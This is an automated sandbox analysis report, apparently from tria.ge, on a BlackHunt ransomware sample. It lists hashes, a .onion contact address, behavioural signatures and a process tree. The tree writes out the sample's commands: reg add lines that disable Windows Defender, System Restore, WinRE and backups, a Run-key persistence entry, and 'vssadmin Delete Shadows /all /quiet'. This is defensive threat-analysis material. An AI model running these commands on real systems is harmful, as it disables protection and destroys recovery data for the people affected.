Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
- max time kernel: 120s
- max time network: 151s
- platform: windows10-2004_x64
- resource: win10v2004-20231222-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20231222-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 18/01/2024, 22:10
- Static task: static1
- Behavioral task behavioral1: sample 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe, resource win7-20231215-en
- Behavioral task behavioral2: sample 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe, resource win10v2004-20231222-en
General
- Target: 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe
- Size: 707KB
- MD5: 757a3aba290567376fa0b21fc14656e0
- SHA1: f511eceb9f89291dead1bc39f3de9182edfbef99
- SHA256: 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be
- SHA512: 6f59a10a37aea79537cc79e919b33b4afc17f0eef90a8cdd819ee19e55c95f75c03f388eecb6477085607e485eaff46c2c66475eb7cd5627335acb533e149bf9
- SSDEEP: 6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1C85vnh:6uaTmkZJ+naie5OTamgEoKxLW59h
Malware Config
- Extracted from: C:\ProgramData\#BlackHunt_ReadMe.hta
- http-equiv="x-ua-compatible"
- http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures

Deletes NTFS Change Journal (2 TTPs, 2 IoCs)
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
Processes (pid): 9872 fsutil.exe, 8696 fsutil.exe

Modifies Windows Defender Real-time Protection settings
- Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" (reg.exe)
- Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection (reg.exe)

UAC bypass
- Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" (2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe)
Clears Windows event logs (1 TTPs, 5 IoCs)
Processes (pid): 7244 wevtutil.exe, 8672 wevtutil.exe, 8384 wevtutil.exe, 9972 wevtutil.exe, 10048 wevtutil.exe

Deletes shadow copies (2 TTPs)
Ransomware often targets backup files to inhibit system recovery.

Modifies boot configuration data using bcdedit (1 TTPs, 4 IoCs)
Processes (pid): 8860 bcdedit.exe, 9084 bcdedit.exe, 13828 bcdedit.exe, 14820 bcdedit.exe

Renames multiple (3362) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.

Processes (pid): 9916 wbadmin.exe, 5156 wbadmin.exe

Disables Task Manager via registry modification

Disables use of System Restore points (1 TTPs)
Checks computer location settings (2 TTPs, 2 IoCs)
Looks up country code configured in the registry, likely geofence.
- Key value queried \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation (2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe)
- Key value queried \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation (cmd.exe)

Adds Run key to start application (2 TTPs, 1 IoCs)
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" (reg.exe)

Checks whether UAC is enabled
- Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" (2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe)
Enumerates connected drives (3 TTPs, 27 IoCs)
Attempts to read the root path of hard drives other than the default C: drive.
All 27 IoCs are "File opened (read-only)" on a \??\<letter>: root path, grouped here by process:
- 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe: \??\Z:, \??\V:, \??\B:, \??\E:, \??\P:, \??\G:, \??\L:, \??\T:, \??\X:, \??\I:, \??\S:, \??\K:, \??\N:, \??\Y:, \??\H:, \??\M:, \??\W:, \??\R:, \??\U:, \??\O:, \??\A:, \??\J:, \??\Q:
- vssadmin.exe: \??\F: (reported twice)
- fsutil.exe: \??\M:, \??\F:
Looks up external IP address via web service (1 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
- flow 8: ip-api.com

Sets desktop wallpaper using registry (2 TTPs, 1 IoCs)
- Set value (str) \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg" (2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe)
Drops file in Program Files directory (64 IoCs)
Process for every entry below: 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe
- File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\ko-kr\#BlackHunt_ReadMe.hta
- File created C:\Program Files\VideoLAN\VLC\locale\kk\LC_MESSAGES\#BlackHunt_ReadMe.hta
- File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\fi-fi\#BlackHunt_ReadMe.txt
- File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\fr-fr\#BlackHunt_ReadMe.txt
- File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\ui-strings.js
- File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\fr-ma\#BlackHunt_ReadMe.txt
- File opened for modification C:\Program Files\7-Zip\Lang\ext.txt
- File created C:\Program Files\VideoLAN\VLC\locale\af\#BlackHunt_Private.key
- File created C:\Program Files\VideoLAN\VLC\locale\sk\#BlackHunt_Private.key
- File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\javafx\glib.md
- File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\selector.js
- File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\#BlackHunt_Private.key
- File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\sv-se\#BlackHunt_Private.key
- File created C:\Program Files\Java\jdk-1.8\include\#BlackHunt_Private.key
- File created C:\Program Files\VideoLAN\VLC\locale\da\LC_MESSAGES\#BlackHunt_Private.key
- File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\ru-ru\#BlackHunt_ReadMe.hta
- File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\appletrailers.luac
- File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\root\#BlackHunt_ReadMe.hta
- File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\en-il\#BlackHunt_ReadMe.hta
- File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\it-it\#BlackHunt_ReadMe.hta
- File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\sv-se\#BlackHunt_ReadMe.txt
- File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\vi_get.svg
- File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\#BlackHunt_ReadMe.txt
- File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\bl.gif
- File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\es-es\#BlackHunt_ReadMe.txt
- File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\ui-strings.js
- File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\ro-ro\#BlackHunt_ReadMe.txt
- File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\ar-ae\ui-strings.js
- File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf
- File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\fi-fi\#BlackHunt_ReadMe.txt
- File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\fr-fr\ui-strings.js
- File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app-api\#BlackHunt_Private.key
- File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\sl-si\#BlackHunt_ReadMe.txt
- File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\es-es\PlayStore_icon.svg
- File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\ru-ru\#BlackHunt_ReadMe.txt
- File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\sv-se\#BlackHunt_ReadMe.txt
- File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\app\#BlackHunt_Private.key
- File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\nb-no\#BlackHunt_ReadMe.hta
- File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\hr-hr\ui-strings.js
- File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\sv-se\#BlackHunt_ReadMe.txt
- File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\ko-kr\#BlackHunt_ReadMe.hta
- File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\he-il\#BlackHunt_ReadMe.txt
- File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\en-ae\#BlackHunt_ReadMe.hta
- File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_gridview.svg
- File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\hu-hu\#BlackHunt_Private.key
- File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\da-dk\#BlackHunt_Private.key
- File created C:\Program Files\Java\jre-1.8\lib\ext\#BlackHunt_Private.key
- File opened for modification C:\Program Files\Java\jdk-1.8\legal\jdk\unicode.md
- File created C:\Program Files\VideoLAN\VLC\locale\am\#BlackHunt_Private.key
- File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\en-gb\#BlackHunt_Private.key
- File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\css\#BlackHunt_ReadMe.hta
- File created C:\Program Files\Java\jdk-1.8\jre\lib\#BlackHunt_Private.key
- File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\ENU\#BlackHunt_ReadMe.txt
- File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\css\#BlackHunt_ReadMe.hta
- File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\images\#BlackHunt_Private.key
- File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\#BlackHunt_ReadMe.hta
- File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\tr-tr\ui-strings.js
- File opened for modification C:\Program Files\7-Zip\Lang\sw.txt
- File opened for modification C:\Program Files\7-Zip\Lang\va.txt
- File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\ar-ae\#BlackHunt_ReadMe.txt
- File opened for modification C:\Program Files\Java\jre-1.8\README.txt
- File created C:\Program Files\VideoLAN\VLC\locale\he\#BlackHunt_ReadMe.txt
- File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\fr-fr\#BlackHunt_ReadMe.hta
- File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\sv-se\#BlackHunt_Private.key
Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).

Program crash (1 IoCs)
- pid 5920, pid_target 4544, WerFault.exe, procid_target 297

Checks SCSI registry key(s) (3 TTPs, 4 IoCs)
SCSI information is often read in order to detect sandboxing environments.
- Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName (vds.exe)
- Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 (vds.exe)
- Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName (vds.exe)
- Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 (vds.exe)

Creates scheduled task(s) (1 TTPs, 1 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes (pid): 2816 schtasks.exe

Interacts with shadow copies (2 TTPs, 6 IoCs)
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes (pid): 3184 vssadmin.exe, 7704 vssadmin.exe, 2640 vssadmin.exe, 1784 vssadmin.exe, 1656 vssadmin.exe, 4844 vssadmin.exe

Kills process with taskkill (1 IoCs)
Processes (pid): 5352 taskkill.exe

Modifies registry class (9 IoCs)
- Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 (reg.exe)
- Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon (reg.exe)
- Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon (reg.exe)
- Key created \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings (cmd.exe)
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ (reg.exe)
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" (reg.exe)
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" (reg.exe)
- Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 (reg.exe)
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ (reg.exe)

Runs ping.exe (1 TTPs, 1 IoCs)
Processes (pid): 12828 PING.EXE

Suspicious behavior: GetForegroundWindowSpam (1 IoCs)
Processes (pid): 1804 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe

Suspicious use of AdjustPrivilegeToken (24 IoCs)
Tokens grouped by process:
- 1804 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe: SeDebugPrivilege, SeRestorePrivilege, SeBackupPrivilege, SeTakeOwnershipPrivilege, SeAuditPrivilege, SeSecurityPrivilege, SeIncBasePriorityPrivilege
- 1112 vssvc.exe: SeBackupPrivilege, SeRestorePrivilege, SeAuditPrivilege
- 9496 wbengine.exe: SeBackupPrivilege, SeRestorePrivilege, SeSecurityPrivilege
- 7244 wevtutil.exe: SeSecurityPrivilege, SeBackupPrivilege
- 8672 wevtutil.exe: SeSecurityPrivilege, SeBackupPrivilege
- 8384 wevtutil.exe: SeSecurityPrivilege, SeBackupPrivilege
- 9972 wevtutil.exe: SeSecurityPrivilege, SeBackupPrivilege
- 10048 wevtutil.exe: SeSecurityPrivilege, SeBackupPrivilege
- 5352 taskkill.exe: SeDebugPrivilege

Suspicious use of WriteProcessMemory (64 IoCs)
Each entry below appears twice in the original table (64 rows in total). The source process is 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe for PID 1804 and cmd.exe for every other source PID.
- PID 1804 wrote to memory of 4008 (procid_target 207)
- PID 1804 wrote to memory of 3272 (procid_target 205)
- PID 1804 wrote to memory of 2436 (procid_target 204)
- PID 1804 wrote to memory of 2876 (procid_target 202)
- PID 4008 wrote to memory of 4544 (procid_target 92)
- PID 1804 wrote to memory of 2512 (procid_target 93)
- PID 3272 wrote to memory of 2196 (procid_target 95)
- PID 2436 wrote to memory of 2948 (procid_target 97)
- PID 2876 wrote to memory of 1932 (procid_target 96)
- PID 1804 wrote to memory of 2996 (procid_target 200)
- PID 1804 wrote to memory of 3192 (procid_target 99)
- PID 1804 wrote to memory of 3380 (procid_target 141)
- PID 1804 wrote to memory of 4800 (procid_target 198)
- PID 2512 wrote to memory of 4468 (procid_target 103)
- PID 1804 wrote to memory of 1468 (procid_target 104)
- PID 1804 wrote to memory of 5020 (procid_target 196)
- PID 2996 wrote to memory of 2844 (procid_target 195)
- PID 3192 wrote to memory of 3592 (procid_target 193)
- PID 1804 wrote to memory of 3820 (procid_target 105)
- PID 3380 wrote to memory of 1520 (procid_target 192)
- PID 1804 wrote to memory of 4460 (procid_target 191)
- PID 4800 wrote to memory of 3776 (procid_target 190)
- PID 1804 wrote to memory of 1812 (procid_target 108)
- PID 5020 wrote to memory of 3388 (procid_target 188)
- PID 1468 wrote to memory of 1724 (procid_target 187)
- PID 3820 wrote to memory of 3256 (procid_target 143)
- PID 1804 wrote to memory of 3664 (procid_target 186)
- PID 4460 wrote to memory of 4216 (procid_target 184)
- PID 1804 wrote to memory of 4332 (procid_target 183)
- PID 1804 wrote to memory of 1320 (procid_target 182)
- PID 1804 wrote to memory of 1912 (procid_target 181)
- PID 1812 wrote to memory of 1472 (procid_target 179)

System policy modification (1 TTPs, 3 IoCs)
- Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System (2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe)
- Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" (2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe)
- Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" (2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe)

Uses Task Scheduler COM API (1 TTPs)
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe"C:\Users\Admin\AppData\Local\Temp\2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe"1⤵
- UAC bypass
- Checks computer location settings
- Checks whether UAC is enabled
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:1804 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2512 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵
- Adds Run key to start application
PID:4468
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:3192 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:3592
-
-
-
    C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f
      PID:3380

    C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f
      - Suspicious use of WriteProcessMemory
      PID:1468

        C:\Windows\system32\reg.exe
          reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f
          PID:1724

    C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f
      - Suspicious use of WriteProcessMemory
      PID:3820

        C:\Windows\system32\reg.exe
          reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f
          PID:3256

    C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f
      - Suspicious use of WriteProcessMemory
      PID:1812

        C:\Windows\system32\reg.exe
          reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f
          PID:1472

    C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f
      PID:2500

        C:\Windows\system32\reg.exe
          reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f
          PID:3900

    C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f
      PID:4344

        C:\Windows\system32\reg.exe
          reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f
          PID:3800

    C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f
      PID:5064

        C:\Windows\system32\reg.exe
          reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f
          PID:4396

    C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f
      PID:2276

        C:\Windows\system32\reg.exe
          reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f
          PID:3184

    C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f
      PID:1600

        C:\Windows\system32\reg.exe
          reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f
          PID:1064

    C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f
      PID:3076

        C:\Windows\system32\reg.exe
          reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f
          PID:4816

    C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f
      PID:900

        C:\Windows\system32\reg.exe
          reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f
          PID:1364

    C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f
      PID:4668

        C:\Windows\system32\reg.exe
          reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f
          PID:2288

    C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f
      PID:3624

        C:\Windows\system32\reg.exe
          reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f
          PID:2040
    C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB
      PID:4604

        C:\Windows\system32\vssadmin.exe
          vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB
          - Enumerates connected drives
          - Interacts with shadow copies
          PID:2640

    C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded
      - Suspicious use of WriteProcessMemory
      PID:3380

        C:\Windows\system32\vssadmin.exe
          vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded
          - Enumerates connected drives
          - Interacts with shadow copies
          PID:1656

        C:\Windows\system32\reg.exe
          reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f
          PID:1520

    C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded
      PID:2648

        C:\Windows\system32\vssadmin.exe
          vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded
          - Interacts with shadow copies
          PID:1784

    C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet
      PID:5000

        C:\Windows\system32\vssadmin.exe
          vssadmin.exe Delete Shadows /all /quiet
          - Interacts with shadow copies
          PID:3184

    C:\Windows\System32\cmd.exe
